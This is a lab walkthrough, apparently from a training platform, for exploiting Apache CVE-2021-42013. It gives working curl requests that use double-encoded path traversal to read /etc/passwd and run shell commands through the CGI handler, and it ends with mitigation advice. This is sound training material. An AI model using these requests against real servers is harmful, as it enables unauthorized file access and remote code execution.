Apache CVE-2021-42013 – Path Traversal & Remote Code Execution Walkthrough
Quick Info
| Property | Value |
|---|---|
| Platform | CyberTask |
| Difficulty | Easy |
| Category | Web Exploitation / CVE |
| Tasks | 5 |
| Cost | Free |
| Access | Browser-based (No VPN required) |
Lab network topology: Your machine → Apache Server (TARGET_IP:8080)
TL;DR
This walkthrough covers CVE-2021-42013, a critical path traversal and remote code execution vulnerability in Apache HTTP Server versions 2.4.49 and 2.4.50. You’ll learn to exploit double URL encoding to bypass filters, read sensitive files like /etc/passwd, and achieve RCE through the CGI handler.
What You’ll Learn
- Understanding CVE-2021-42013 and its root cause
- Double URL encoding bypass techniques
- Path traversal exploitation using
curl - Remote code execution via CGI handler
- Reading sensitive system files from vulnerable servers
Prerequisites
- Basic understanding of HTTP and web servers
- Familiarity with command line (curl)
- A free CyberTask account
curl which is pre-installed on Windows 10+, macOS, and Linux. No additional tools required.Task 1: Understanding CVE-2021-42013
CVE-2021-42013 is a path traversal and remote code execution vulnerability affecting Apache HTTP Server versions 2.4.49 and 2.4.50. This vulnerability emerged because the fix for an earlier vulnerability (CVE-2021-41773) was incomplete.
The Vulnerability
The flaw allows attackers to use double URL encoding to bypass Apache’s path traversal filters. Here’s how it works:
| Encoding Stage | Value | Description |
|---|---|---|
| Original | %%32%65 |
Double-encoded dot |
| First decode | %2e |
Single-encoded dot |
| Second decode | . |
Literal dot character |
By encoding a dot (.) as %%32%65, attackers can climb out of the web root directory and access arbitrary files on the system.
When RCE is Possible
When Apache has mod_cgi or mod_cgid enabled, this path traversal can be leveraged to reach /bin/sh and execute arbitrary commands on the server.
Impact
- Confidentiality: Read sensitive files (
/etc/passwd, configuration files, source code) - Integrity: Modify files if permissions allow
- Availability: Execute commands that could crash or compromise the server
Task 2: Identify Apache Version
Before exploitation, confirm the target is running a vulnerable Apache version.
Using curl to Check Version
Run the following command (replace <TARGET_IP> with your lab’s public IP from the network topology):
curl -I http://<TARGET_IP>:8080/curl.exe -I http://<TARGET_IP>:8080/Expected Output
Look for the Server header in the response:
HTTP/1.1 200 OK
Date: ...
Server: Apache/2.4.50 (Unix)
...The version 2.4.49 or 2.4.50 confirms the server is vulnerable to CVE-2021-42013.
Task 3: Directory Traversal Proof-of-Concept
Now let’s exploit the path traversal vulnerability to read sensitive files.
Reading /etc/os-release
First, verify the vulnerability works by reading the OS release file:
curl -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/os-release'curl.exe -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/os-release'Expected Output
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
...Why It Works
Each %%32%65 sequence becomes . after two decoding passes, allowing directory climbing (/../../../..) despite Apache’s attempted filter.
Your Task: Read /etc/passwd
Modify the command to read /etc/passwd and identify users with home directories:
curl -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'curl.exe -v --path-as-is 'http://<TARGET_IP>:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'Look for entries with /home/ directories:
user:x:1000:1000::/home/user:/bin/bashTask 4: Remote Code Execution (RCE)
With mod_cgi enabled, we can escalate from path traversal to full remote code execution.
How RCE Works
The vulnerability allows us to invoke /bin/sh through the CGI handler. By sending a POST request with commands, we can execute arbitrary code on the server.
Step 1: List Files in Web Directory
curl -v --data "echo;ls /usr/local/apache2/htdocs/" \
'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'curl.exe -v --data "echo;ls /usr/local/apache2/htdocs/" 'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'This will list all files in the web directory, including a hidden flag file.
Step 2: Read the Flag
Once you identify the flag file, read its contents:
curl -v --data "echo;cat /usr/local/apache2/htdocs/<FLAG_FILENAME>" \
'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'curl.exe -v --data "echo;cat /usr/local/apache2/htdocs/<FLAG_FILENAME>" 'http://<TARGET_IP>:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'echo; prefix is required to separate the output from the shell’s initial response. You can chain multiple commands using ; or &&.Task 5: Additional References
For deeper understanding of CVE-2021-42013, explore these resources:
- Walnut Security: Path Traversal & RCE in Apache
- Enciphers: Exploiting CVE-2021-42013
- Apache Security Advisory
- NVD CVE-2021-42013
Mitigation & Defense
If you’re a defender, here’s how to protect against CVE-2021-42013:
| Mitigation | Description |
|---|---|
| Update Apache | Upgrade to version 2.4.51 or later immediately |
| Disable CGI | If not needed, disable mod_cgi and mod_cgid |
| Require all denied | Ensure <Directory /> has Require all denied |
| WAF Rules | Deploy WAF rules to detect encoded path traversal |
| Monitor Logs | Watch for suspicious requests with % characters |
FAQ
What is CVE-2021-42013?
CVE-2021-42013 is a path traversal and remote code execution vulnerability in Apache HTTP Server 2.4.49 and 2.4.50. It allows attackers to read arbitrary files and execute commands by using double URL encoding to bypass security filters.
Why was the original fix incomplete?
The fix for CVE-2021-41773 only addressed single URL encoding. Researchers discovered that double encoding (%%32%65 instead of %2e) could bypass the filter, leading to CVE-2021-42013.
What versions are affected?
Only Apache HTTP Server versions 2.4.49 and 2.4.50 are vulnerable. Version 2.4.51 and later include the complete fix.
Is RCE always possible?
No. RCE requires mod_cgi or mod_cgid to be enabled. Without these modules, only path traversal (file reading) is possible.
How can I check if my server is vulnerable?
Check your Apache version with httpd -v or by examining the Server header in HTTP responses. If running 2.4.49 or 2.4.50, update immediately.
Conclusion
You’ve successfully exploited CVE-2021-42013, demonstrating how a simple encoding bypass can lead to complete server compromise. This vulnerability highlights the importance of thorough security testing and keeping software updated.
Key takeaways:
- Double URL encoding can bypass naive input filters
- Path traversal vulnerabilities can escalate to RCE
- Always update to the latest patched versions
Start the Apache CVE-2021-42013 Lab →